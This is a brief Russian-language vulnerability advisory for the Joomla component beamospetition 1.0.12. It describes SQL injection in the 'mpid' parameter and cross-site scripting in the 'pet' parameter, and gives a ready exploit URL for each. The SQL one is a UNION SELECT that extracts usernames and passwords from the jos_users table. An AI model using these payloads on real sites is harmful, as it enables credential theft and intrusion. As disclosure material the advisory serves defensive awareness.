Программа: Joomla Component beamospetition 1.0.12

Уязвимость позволяет удаленному пользователю выполнить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в
параметре «mpid». Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

http://[site]/?option=com_beamospetition&func=sign&mpid=-9999’%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*

Уязвимость существует из-за недостаточной обработки входных данных в
параметре «pet». Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://[site]/?option=com_beamospetition&func=sign&pet=’><script>alert(‘Xss’)</script>

Оставить мнение